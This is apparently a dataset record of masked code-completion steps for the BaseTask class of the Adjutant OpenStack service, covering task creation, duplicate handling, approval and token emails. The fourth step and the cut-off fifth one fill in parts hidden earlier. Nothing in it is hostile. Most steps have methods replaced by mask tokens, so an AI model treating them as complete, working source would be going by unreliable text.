{ "blob_id": "cc23eeed44ff66d68c700163cca8b9f4986d497d", "index": 7681, "step-1": "<mask token>\n\n\nclass BaseTask(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, task_model=None, task_data=None, action_data=None):\n self._config = None\n self.logger = getLogger('adjutant')\n if task_model:\n self.task = task_model\n self._refresh_actions()\n else:\n action_serializer_list = self._instantiate_action_serializers(\n action_data)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n keystone_user = task_data.get('keystone_user', {})\n self.task = Task.objects.create(keystone_user=keystone_user,\n project_id=keystone_user.get('project_id'), task_type=self.\n task_type, hash_key=hash_key)\n self.task.save()\n self.actions = []\n for i, action in enumerate(action_serializer_list):\n data = action['serializer'].validated_data\n self.actions.append(action['action'](data=data, task=self.\n task, order=i))\n self.logger.info(\"(%s) - '%s' task created (%s).\" % (timezone.\n now(), self.task_type, self.task.uuid))\n <mask token>\n\n def _create_task_hash(self, action_list):\n hashable_list = [self.task_type]\n for action in action_list:\n hashable_list.append(action['name'])\n if not action['serializer']:\n continue\n fields = sorted(action['serializer'].validated_data.keys())\n for field in fields:\n try:\n hashable_list.append(action['serializer'].\n validated_data[field])\n except KeyError:\n if field == 'username' and CONF.identity.username_is_email:\n continue\n else:\n raise\n return hashlib.sha256(str(hashable_list).encode('utf-8')).hexdigest()\n\n def _handle_duplicates(self, hash_key):\n duplicate_tasks = Task.objects.filter(hash_key=hash_key, completed=\n 0, cancelled=0)\n if not duplicate_tasks:\n return\n if self.duplicate_policy == 'cancel':\n now = timezone.now()\n self.logger.info(\n '(%s) - Task is a duplicate - Cancelling old tasks.' % now)\n for task in duplicate_tasks:\n task.add_task_note(\n 'Task cancelled because was an old duplicate. 
- (%s)' % now\n )\n task.get_task().cancel()\n return\n raise exceptions.TaskDuplicateFound()\n\n def _refresh_actions(self):\n self.actions = [a.get_action() for a in self.task.actions]\n\n def _create_token(self):\n self.clear_tokens()\n token_expiry = self.config.token_expiry or self.token_expiry\n token = create_token(self.task, token_expiry)\n self.add_note('Token created for task.')\n try:\n email_conf = self.config.emails.token\n send_stage_email(self.task, email_conf, token)\n except KeyError as e:\n handle_task_error(e, self.task, error_text='while sending token')\n\n def add_note(self, note):\n \"\"\"\n Logs the note, and also adds it to the task notes.\n \"\"\"\n now = timezone.now()\n self.logger.info('(%s)(%s)(%s) - %s' % (now, self.task_type, self.\n task.uuid, note))\n note = '%s - (%s)' % (note, now)\n self.task.add_task_note(note)\n <mask token>\n\n def is_valid(self, internal_message=None):\n self._refresh_actions()\n valid = all([act.valid for act in self.actions])\n if not valid:\n raise exceptions.TaskActionsInvalid(self.task,\n 'actions invalid', internal_message)\n\n @property\n def approved(self):\n return self.task.approved\n <mask token>\n <mask token>\n\n def confirm_state(self, approved=None, completed=None, cancelled=None):\n \"\"\"Check that the Task is in a given state.\n\n None value means state is ignored. Otherwise expects true or false.\n \"\"\"\n if completed is not None:\n if self.task.completed and not completed:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been completed.')\n if not self.task.completed and completed:\n raise exceptions.TaskStateInvalid(self.task,\n \"This task hasn't been completed.\")\n if cancelled is not None:\n if self.task.cancelled and not cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has been cancelled.')\n if not self.task.cancelled and cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been cancelled.')\n if approved is not None:\n if self.task.approved and not approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been approved.')\n if not self.task.approved and approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been approved.')\n\n def update(self, action_data):\n self.confirm_state(approved=False, completed=False, cancelled=False)\n action_serializer_list = self._instantiate_action_serializers(\n action_data, use_existing_actions=True)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n for action in action_serializer_list:\n data = action['serializer'].validated_data\n action['action'].action.action_data = data\n action['action'].action.save()\n self._refresh_actions()\n self.prepare()\n <mask token>\n\n def approve(self, approved_by='system'):\n \"\"\"Run the approve stage for all the actions.\"\"\"\n self.confirm_state(completed=False, cancelled=False)\n self.is_valid('task invalid before approval')\n self.task.approved = True\n self.task.approved_on = timezone.now()\n self.task.approved_by = approved_by\n self.task.save()\n for action in self.actions:\n try:\n action.approve()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\n 'while approving task')\n self.is_valid('task invalid after approval')\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n else:\n self.submit()\n\n def reissue_token(self):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n 
need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n <mask token>\n\n def submit(self, token_data=None, keystone_user=None):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n required_fields = set()\n actions = []\n for action in self.task.actions:\n a = action.get_action()\n actions.append(a)\n for field in a.token_fields:\n required_fields.add(field)\n if not token_data:\n token_data = {}\n errors = {}\n data = {}\n for field in required_fields:\n try:\n data[field] = token_data[field]\n except KeyError:\n errors[field] = ['This field is required.']\n except TypeError:\n errors = [\n 'Improperly formated json. Should be a key-value object.']\n break\n if errors:\n raise exceptions.TaskTokenSerializersInvalid(self.task, errors)\n self.is_valid('task invalid before submit')\n for action in actions:\n try:\n action.submit(data, keystone_user)\n except Exception as e:\n handle_task_error(e, self.task, 'while submiting task')\n self.is_valid('task invalid after submit')\n self.task.completed = True\n self.task.completed_on = timezone.now()\n self.task.save()\n for token in self.task.tokens:\n token.delete()\n email_conf = self.config.emails.completed\n send_stage_email(self.task, email_conf)\n <mask token>\n", "step-2": "<mask token>\n\n\nclass BaseTask(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, task_model=None, task_data=None, action_data=None):\n self._config = None\n self.logger = getLogger('adjutant')\n if task_model:\n self.task = task_model\n self._refresh_actions()\n else:\n action_serializer_list = self._instantiate_action_serializers(\n action_data)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n keystone_user = task_data.get('keystone_user', {})\n self.task = Task.objects.create(keystone_user=keystone_user,\n project_id=keystone_user.get('project_id'), task_type=self.\n task_type, hash_key=hash_key)\n self.task.save()\n self.actions = []\n for i, action in enumerate(action_serializer_list):\n data = action['serializer'].validated_data\n self.actions.append(action['action'](data=data, task=self.\n task, order=i))\n self.logger.info(\"(%s) - '%s' task created (%s).\" % (timezone.\n now(), self.task_type, self.task.uuid))\n <mask token>\n\n def _create_task_hash(self, action_list):\n hashable_list = [self.task_type]\n for action in action_list:\n hashable_list.append(action['name'])\n if not action['serializer']:\n continue\n fields = sorted(action['serializer'].validated_data.keys())\n for field in fields:\n try:\n hashable_list.append(action['serializer'].\n validated_data[field])\n except KeyError:\n if field == 'username' and CONF.identity.username_is_email:\n continue\n else:\n raise\n return hashlib.sha256(str(hashable_list).encode('utf-8')).hexdigest()\n\n def _handle_duplicates(self, hash_key):\n duplicate_tasks = Task.objects.filter(hash_key=hash_key, completed=\n 0, cancelled=0)\n if not duplicate_tasks:\n return\n if self.duplicate_policy == 'cancel':\n now = timezone.now()\n self.logger.info(\n '(%s) - Task is a duplicate - Cancelling old tasks.' % now)\n for task in duplicate_tasks:\n task.add_task_note(\n 'Task cancelled because was an old duplicate. 
- (%s)' % now\n )\n task.get_task().cancel()\n return\n raise exceptions.TaskDuplicateFound()\n\n def _refresh_actions(self):\n self.actions = [a.get_action() for a in self.task.actions]\n\n def _create_token(self):\n self.clear_tokens()\n token_expiry = self.config.token_expiry or self.token_expiry\n token = create_token(self.task, token_expiry)\n self.add_note('Token created for task.')\n try:\n email_conf = self.config.emails.token\n send_stage_email(self.task, email_conf, token)\n except KeyError as e:\n handle_task_error(e, self.task, error_text='while sending token')\n\n def add_note(self, note):\n \"\"\"\n Logs the note, and also adds it to the task notes.\n \"\"\"\n now = timezone.now()\n self.logger.info('(%s)(%s)(%s) - %s' % (now, self.task_type, self.\n task.uuid, note))\n note = '%s - (%s)' % (note, now)\n self.task.add_task_note(note)\n\n @property\n def config(self):\n \"\"\"Get my config.\n\n Returns a dict of the config for this task.\n \"\"\"\n if self._config is None:\n try:\n task_conf = CONF.workflow.tasks[self.task_type]\n except KeyError:\n task_conf = {}\n self._config = CONF.workflow.task_defaults.overlay(task_conf)\n return self._config\n\n def is_valid(self, internal_message=None):\n self._refresh_actions()\n valid = all([act.valid for act in self.actions])\n if not valid:\n raise exceptions.TaskActionsInvalid(self.task,\n 'actions invalid', internal_message)\n\n @property\n def approved(self):\n return self.task.approved\n <mask token>\n\n @property\n def cancelled(self):\n return self.task.cancelled\n\n def confirm_state(self, approved=None, completed=None, cancelled=None):\n \"\"\"Check that the Task is in a given state.\n\n None value means state is ignored. Otherwise expects true or false.\n \"\"\"\n if completed is not None:\n if self.task.completed and not completed:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been completed.')\n if not self.task.completed and completed:\n raise exceptions.TaskStateInvalid(self.task,\n \"This task hasn't been completed.\")\n if cancelled is not None:\n if self.task.cancelled and not cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has been cancelled.')\n if not self.task.cancelled and cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been cancelled.')\n if approved is not None:\n if self.task.approved and not approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been approved.')\n if not self.task.approved and approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been approved.')\n\n def update(self, action_data):\n self.confirm_state(approved=False, completed=False, cancelled=False)\n action_serializer_list = self._instantiate_action_serializers(\n action_data, use_existing_actions=True)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n for action in action_serializer_list:\n data = action['serializer'].validated_data\n action['action'].action.action_data = data\n action['action'].action.save()\n self._refresh_actions()\n self.prepare()\n <mask token>\n\n def approve(self, approved_by='system'):\n \"\"\"Run the approve stage for all the actions.\"\"\"\n self.confirm_state(completed=False, cancelled=False)\n self.is_valid('task invalid before approval')\n self.task.approved = True\n self.task.approved_on = timezone.now()\n self.task.approved_by = approved_by\n self.task.save()\n for action in self.actions:\n try:\n action.approve()\n except 
Exception as e:\n handle_task_error(e, self.task, error_text=\n 'while approving task')\n self.is_valid('task invalid after approval')\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n else:\n self.submit()\n\n def reissue_token(self):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n\n def clear_tokens(self):\n for token in self.task.tokens:\n token.delete()\n\n def submit(self, token_data=None, keystone_user=None):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n required_fields = set()\n actions = []\n for action in self.task.actions:\n a = action.get_action()\n actions.append(a)\n for field in a.token_fields:\n required_fields.add(field)\n if not token_data:\n token_data = {}\n errors = {}\n data = {}\n for field in required_fields:\n try:\n data[field] = token_data[field]\n except KeyError:\n errors[field] = ['This field is required.']\n except TypeError:\n errors = [\n 'Improperly formated json. Should be a key-value object.']\n break\n if errors:\n raise exceptions.TaskTokenSerializersInvalid(self.task, errors)\n self.is_valid('task invalid before submit')\n for action in actions:\n try:\n action.submit(data, keystone_user)\n except Exception as e:\n handle_task_error(e, self.task, 'while submiting task')\n self.is_valid('task invalid after submit')\n self.task.completed = True\n self.task.completed_on = timezone.now()\n self.task.save()\n for token in self.task.tokens:\n token.delete()\n email_conf = self.config.emails.completed\n send_stage_email(self.task, email_conf)\n <mask token>\n", "step-3": "<mask token>\n\n\nclass BaseTask(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, task_model=None, task_data=None, action_data=None):\n self._config = None\n self.logger = getLogger('adjutant')\n if task_model:\n self.task = task_model\n self._refresh_actions()\n else:\n action_serializer_list = self._instantiate_action_serializers(\n action_data)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n keystone_user = task_data.get('keystone_user', {})\n self.task = Task.objects.create(keystone_user=keystone_user,\n project_id=keystone_user.get('project_id'), task_type=self.\n task_type, hash_key=hash_key)\n self.task.save()\n self.actions = []\n for i, action in enumerate(action_serializer_list):\n data = action['serializer'].validated_data\n self.actions.append(action['action'](data=data, task=self.\n task, order=i))\n self.logger.info(\"(%s) - '%s' task created (%s).\" % (timezone.\n now(), self.task_type, self.task.uuid))\n <mask token>\n\n def _create_task_hash(self, action_list):\n hashable_list = [self.task_type]\n for action in action_list:\n hashable_list.append(action['name'])\n if not action['serializer']:\n continue\n fields = sorted(action['serializer'].validated_data.keys())\n for field in fields:\n try:\n hashable_list.append(action['serializer'].\n validated_data[field])\n except KeyError:\n if field == 'username' and CONF.identity.username_is_email:\n continue\n else:\n raise\n return hashlib.sha256(str(hashable_list).encode('utf-8')).hexdigest()\n\n def _handle_duplicates(self, hash_key):\n duplicate_tasks = Task.objects.filter(hash_key=hash_key, 
completed=\n 0, cancelled=0)\n if not duplicate_tasks:\n return\n if self.duplicate_policy == 'cancel':\n now = timezone.now()\n self.logger.info(\n '(%s) - Task is a duplicate - Cancelling old tasks.' % now)\n for task in duplicate_tasks:\n task.add_task_note(\n 'Task cancelled because was an old duplicate. - (%s)' % now\n )\n task.get_task().cancel()\n return\n raise exceptions.TaskDuplicateFound()\n\n def _refresh_actions(self):\n self.actions = [a.get_action() for a in self.task.actions]\n\n def _create_token(self):\n self.clear_tokens()\n token_expiry = self.config.token_expiry or self.token_expiry\n token = create_token(self.task, token_expiry)\n self.add_note('Token created for task.')\n try:\n email_conf = self.config.emails.token\n send_stage_email(self.task, email_conf, token)\n except KeyError as e:\n handle_task_error(e, self.task, error_text='while sending token')\n\n def add_note(self, note):\n \"\"\"\n Logs the note, and also adds it to the task notes.\n \"\"\"\n now = timezone.now()\n self.logger.info('(%s)(%s)(%s) - %s' % (now, self.task_type, self.\n task.uuid, note))\n note = '%s - (%s)' % (note, now)\n self.task.add_task_note(note)\n\n @property\n def config(self):\n \"\"\"Get my config.\n\n Returns a dict of the config for this task.\n \"\"\"\n if self._config is None:\n try:\n task_conf = CONF.workflow.tasks[self.task_type]\n except KeyError:\n task_conf = {}\n self._config = CONF.workflow.task_defaults.overlay(task_conf)\n return self._config\n\n def is_valid(self, internal_message=None):\n self._refresh_actions()\n valid = all([act.valid for act in self.actions])\n if not valid:\n raise exceptions.TaskActionsInvalid(self.task,\n 'actions invalid', internal_message)\n\n @property\n def approved(self):\n return self.task.approved\n\n @property\n def completed(self):\n return self.task.completed\n\n @property\n def cancelled(self):\n return self.task.cancelled\n\n def confirm_state(self, approved=None, completed=None, cancelled=None):\n \"\"\"Check that the Task is in a given state.\n\n None value means state is ignored. 
Otherwise expects true or false.\n \"\"\"\n if completed is not None:\n if self.task.completed and not completed:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been completed.')\n if not self.task.completed and completed:\n raise exceptions.TaskStateInvalid(self.task,\n \"This task hasn't been completed.\")\n if cancelled is not None:\n if self.task.cancelled and not cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has been cancelled.')\n if not self.task.cancelled and cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been cancelled.')\n if approved is not None:\n if self.task.approved and not approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been approved.')\n if not self.task.approved and approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been approved.')\n\n def update(self, action_data):\n self.confirm_state(approved=False, completed=False, cancelled=False)\n action_serializer_list = self._instantiate_action_serializers(\n action_data, use_existing_actions=True)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n for action in action_serializer_list:\n data = action['serializer'].validated_data\n action['action'].action.action_data = data\n action['action'].action.save()\n self._refresh_actions()\n self.prepare()\n <mask token>\n\n def approve(self, approved_by='system'):\n \"\"\"Run the approve stage for all the actions.\"\"\"\n self.confirm_state(completed=False, cancelled=False)\n self.is_valid('task invalid before approval')\n self.task.approved = True\n self.task.approved_on = timezone.now()\n self.task.approved_by = approved_by\n self.task.save()\n for action in self.actions:\n try:\n action.approve()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\n 'while approving task')\n self.is_valid('task invalid after approval')\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n else:\n self.submit()\n\n def reissue_token(self):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n\n def clear_tokens(self):\n for token in self.task.tokens:\n token.delete()\n\n def submit(self, token_data=None, keystone_user=None):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n required_fields = set()\n actions = []\n for action in self.task.actions:\n a = action.get_action()\n actions.append(a)\n for field in a.token_fields:\n required_fields.add(field)\n if not token_data:\n token_data = {}\n errors = {}\n data = {}\n for field in required_fields:\n try:\n data[field] = token_data[field]\n except KeyError:\n errors[field] = ['This field is required.']\n except TypeError:\n errors = [\n 'Improperly formated json. 
Should be a key-value object.']\n break\n if errors:\n raise exceptions.TaskTokenSerializersInvalid(self.task, errors)\n self.is_valid('task invalid before submit')\n for action in actions:\n try:\n action.submit(data, keystone_user)\n except Exception as e:\n handle_task_error(e, self.task, 'while submiting task')\n self.is_valid('task invalid after submit')\n self.task.completed = True\n self.task.completed_on = timezone.now()\n self.task.save()\n for token in self.task.tokens:\n token.delete()\n email_conf = self.config.emails.completed\n send_stage_email(self.task, email_conf)\n <mask token>\n", "step-4": "<mask token>\n\n\nclass BaseTask(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, task_model=None, task_data=None, action_data=None):\n self._config = None\n self.logger = getLogger('adjutant')\n if task_model:\n self.task = task_model\n self._refresh_actions()\n else:\n action_serializer_list = self._instantiate_action_serializers(\n action_data)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n keystone_user = task_data.get('keystone_user', {})\n self.task = Task.objects.create(keystone_user=keystone_user,\n project_id=keystone_user.get('project_id'), task_type=self.\n task_type, hash_key=hash_key)\n self.task.save()\n self.actions = []\n for i, action in enumerate(action_serializer_list):\n data = action['serializer'].validated_data\n self.actions.append(action['action'](data=data, task=self.\n task, order=i))\n self.logger.info(\"(%s) - '%s' task created (%s).\" % (timezone.\n now(), self.task_type, self.task.uuid))\n\n def _instantiate_action_serializers(self, action_data,\n use_existing_actions=False):\n action_serializer_list = []\n if use_existing_actions:\n actions = self.actions\n else:\n actions = self.default_actions[:]\n actions += self.config.additional_actions\n valid = True\n for action in actions:\n if use_existing_actions:\n action_name = action.action.action_name\n else:\n action_name = action\n action_class = adj_actions.ACTION_CLASSES[action_name]\n if use_existing_actions:\n action_class = action\n if not action_class.serializer:\n raise exceptions.SerializerMissingException(\n 'No serializer defined for action %s' % action_name)\n serializer = action_class.serializer(data=action_data)\n action_serializer_list.append({'name': action_name, 'action':\n action_class, 'serializer': serializer})\n if serializer and not serializer.is_valid():\n valid = False\n if not valid:\n errors = {}\n for action in action_serializer_list:\n if action['serializer']:\n errors.update(action['serializer'].errors)\n raise exceptions.TaskSerializersInvalid(errors)\n return action_serializer_list\n\n def _create_task_hash(self, action_list):\n hashable_list = [self.task_type]\n for action in action_list:\n hashable_list.append(action['name'])\n if not action['serializer']:\n continue\n fields = sorted(action['serializer'].validated_data.keys())\n for field in fields:\n try:\n hashable_list.append(action['serializer'].\n validated_data[field])\n except KeyError:\n if field == 'username' and CONF.identity.username_is_email:\n continue\n else:\n raise\n return hashlib.sha256(str(hashable_list).encode('utf-8')).hexdigest()\n\n def _handle_duplicates(self, hash_key):\n duplicate_tasks = Task.objects.filter(hash_key=hash_key, completed=\n 0, cancelled=0)\n if not 
duplicate_tasks:\n return\n if self.duplicate_policy == 'cancel':\n now = timezone.now()\n self.logger.info(\n '(%s) - Task is a duplicate - Cancelling old tasks.' % now)\n for task in duplicate_tasks:\n task.add_task_note(\n 'Task cancelled because was an old duplicate. - (%s)' % now\n )\n task.get_task().cancel()\n return\n raise exceptions.TaskDuplicateFound()\n\n def _refresh_actions(self):\n self.actions = [a.get_action() for a in self.task.actions]\n\n def _create_token(self):\n self.clear_tokens()\n token_expiry = self.config.token_expiry or self.token_expiry\n token = create_token(self.task, token_expiry)\n self.add_note('Token created for task.')\n try:\n email_conf = self.config.emails.token\n send_stage_email(self.task, email_conf, token)\n except KeyError as e:\n handle_task_error(e, self.task, error_text='while sending token')\n\n def add_note(self, note):\n \"\"\"\n Logs the note, and also adds it to the task notes.\n \"\"\"\n now = timezone.now()\n self.logger.info('(%s)(%s)(%s) - %s' % (now, self.task_type, self.\n task.uuid, note))\n note = '%s - (%s)' % (note, now)\n self.task.add_task_note(note)\n\n @property\n def config(self):\n \"\"\"Get my config.\n\n Returns a dict of the config for this task.\n \"\"\"\n if self._config is None:\n try:\n task_conf = CONF.workflow.tasks[self.task_type]\n except KeyError:\n task_conf = {}\n self._config = CONF.workflow.task_defaults.overlay(task_conf)\n return self._config\n\n def is_valid(self, internal_message=None):\n self._refresh_actions()\n valid = all([act.valid for act in self.actions])\n if not valid:\n raise exceptions.TaskActionsInvalid(self.task,\n 'actions invalid', internal_message)\n\n @property\n def approved(self):\n return self.task.approved\n\n @property\n def completed(self):\n return self.task.completed\n\n @property\n def cancelled(self):\n return self.task.cancelled\n\n def confirm_state(self, approved=None, completed=None, cancelled=None):\n \"\"\"Check that the Task is in a given state.\n\n None value means state is ignored. 
Otherwise expects true or false.\n \"\"\"\n if completed is not None:\n if self.task.completed and not completed:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been completed.')\n if not self.task.completed and completed:\n raise exceptions.TaskStateInvalid(self.task,\n \"This task hasn't been completed.\")\n if cancelled is not None:\n if self.task.cancelled and not cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has been cancelled.')\n if not self.task.cancelled and cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been cancelled.')\n if approved is not None:\n if self.task.approved and not approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been approved.')\n if not self.task.approved and approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been approved.')\n\n def update(self, action_data):\n self.confirm_state(approved=False, completed=False, cancelled=False)\n action_serializer_list = self._instantiate_action_serializers(\n action_data, use_existing_actions=True)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n for action in action_serializer_list:\n data = action['serializer'].validated_data\n action['action'].action.action_data = data\n action['action'].action.save()\n self._refresh_actions()\n self.prepare()\n\n def prepare(self):\n \"\"\"Run the prepare stage for all the actions.\n\n If the task can be auto approved, this will also run the approve\n stage.\n \"\"\"\n self.confirm_state(approved=False, completed=False, cancelled=False)\n for action in self.actions:\n try:\n action.prepare()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\n 'while setting up task')\n email_conf = self.config.emails.initial\n send_stage_email(self.task, email_conf)\n approve_list = [act.auto_approve for act in self.actions]\n if False in approve_list:\n can_auto_approve = False\n elif True in approve_list:\n can_auto_approve = True\n else:\n can_auto_approve = False\n if self.config.allow_auto_approve is not None:\n allow_auto_approve = self.config.allow_auto_approve\n else:\n allow_auto_approve = self.allow_auto_approve\n if can_auto_approve and not allow_auto_approve:\n self.add_note('Actions allow auto aproval, but task does not.')\n elif can_auto_approve:\n self.add_note('Action allow auto approval. 
Auto approving.')\n self.approve()\n return\n if self.send_approval_notification:\n notes = {'notes': [\"'%s' task needs approval.\" % self.task_type]}\n create_notification(self.task, notes)\n\n def approve(self, approved_by='system'):\n \"\"\"Run the approve stage for all the actions.\"\"\"\n self.confirm_state(completed=False, cancelled=False)\n self.is_valid('task invalid before approval')\n self.task.approved = True\n self.task.approved_on = timezone.now()\n self.task.approved_by = approved_by\n self.task.save()\n for action in self.actions:\n try:\n action.approve()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\n 'while approving task')\n self.is_valid('task invalid after approval')\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n else:\n self.submit()\n\n def reissue_token(self):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n\n def clear_tokens(self):\n for token in self.task.tokens:\n token.delete()\n\n def submit(self, token_data=None, keystone_user=None):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n required_fields = set()\n actions = []\n for action in self.task.actions:\n a = action.get_action()\n actions.append(a)\n for field in a.token_fields:\n required_fields.add(field)\n if not token_data:\n token_data = {}\n errors = {}\n data = {}\n for field in required_fields:\n try:\n data[field] = token_data[field]\n except KeyError:\n errors[field] = ['This field is required.']\n except TypeError:\n errors = [\n 'Improperly formated json. Should be a key-value object.']\n break\n if errors:\n raise exceptions.TaskTokenSerializersInvalid(self.task, errors)\n self.is_valid('task invalid before submit')\n for action in actions:\n try:\n action.submit(data, keystone_user)\n except Exception as e:\n handle_task_error(e, self.task, 'while submiting task')\n self.is_valid('task invalid after submit')\n self.task.completed = True\n self.task.completed_on = timezone.now()\n self.task.save()\n for token in self.task.tokens:\n token.delete()\n email_conf = self.config.emails.completed\n send_stage_email(self.task, email_conf)\n <mask token>\n", "step-5": "# Copyright (C) 2019 Catalyst Cloud Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport hashlib\nfrom logging import getLogger\n\nfrom confspirator import groups\nfrom confspirator import fields\n\nfrom adjutant import actions as adj_actions\nfrom adjutant.api.models import Task\nfrom adjutant.config import CONF\nfrom django.utils import timezone\nfrom adjutant.notifications.utils import create_notification\nfrom adjutant.tasks.v1.utils import send_stage_email, create_token, handle_task_error\nfrom adjutant import exceptions\n\n\ndef make_task_config(task_class):\n config_group = groups.DynamicNameConfigGroup()\n config_group.register_child_config(\n fields.BoolConfig(\n \"allow_auto_approve\",\n help_text=\"Override if this task allows auto_approval. \"\n \"Otherwise uses task default.\",\n default=task_class.allow_auto_approve,\n )\n )\n config_group.register_child_config(\n fields.ListConfig(\n \"additional_actions\",\n help_text=\"Additional actions to be run as part of the task \"\n \"after default actions.\",\n default=task_class.additional_actions or [],\n )\n )\n config_group.register_child_config(\n fields.IntConfig(\n \"token_expiry\",\n help_text=\"Override for the task token expiry. \"\n \"Otherwise uses task default.\",\n default=task_class.token_expiry,\n )\n )\n config_group.register_child_config(\n fields.DictConfig(\n \"actions\",\n help_text=\"Action config overrides over the action defaults. \"\n \"See 'adjutant.workflow.action_defaults'.\",\n is_json=True,\n default=task_class.action_config or {},\n sample_default={\n \"SomeCustomAction\": {\"some_action_setting\": \"<a-uuid-probably>\"}\n },\n )\n )\n config_group.register_child_config(\n fields.DictConfig(\n \"emails\",\n help_text=\"Email config overrides for this task over task defaults.\"\n \"See 'adjutant.workflow.emails'.\",\n is_json=True,\n default=task_class.email_config or {},\n sample_default={\n \"initial\": None,\n \"token\": {\n \"subject\": \"Some custom subject\",\n },\n },\n )\n )\n config_group.register_child_config(\n fields.DictConfig(\n \"notifications\",\n help_text=\"Notification config overrides for this task over task defaults.\"\n \"See 'adjutant.workflow.notifications'.\",\n is_json=True,\n default=task_class.notification_config or {},\n sample_default={\n \"standard_handlers\": [\"EmailNotification\"],\n \"error_handlers\": [\"EmailNotification\"],\n \"standard_handler_config\": {\n \"EmailNotification\": {\n \"emails\": [\"[email protected]\"],\n \"reply\": \"[email protected]\",\n }\n },\n \"error_handler_config\": {\n \"EmailNotification\": {\n \"emails\": [\"[email protected]\"],\n \"reply\": \"[email protected]\",\n }\n },\n },\n )\n )\n return config_group\n\n\nclass BaseTask(object):\n \"\"\"\n Base class for in memory task representation.\n\n This serves as the internal task logic handler, and is used to\n define what a task looks like.\n\n Most of the time this class shouldn't be called or used directly\n as the task manager is what handles the direct interaction to the\n logic here, and includes some wrapper logic to help deal with workflows.\n \"\"\"\n\n # required values in custom task\n task_type = None\n default_actions = None\n\n # default values to optionally override in task definition\n deprecated_task_types = None\n duplicate_policy = \"cancel\"\n send_approval_notification = True\n token_requires_authentication = False\n\n # config defaults for the task (used to generate default config):\n allow_auto_approve = True\n additional_actions = None\n 
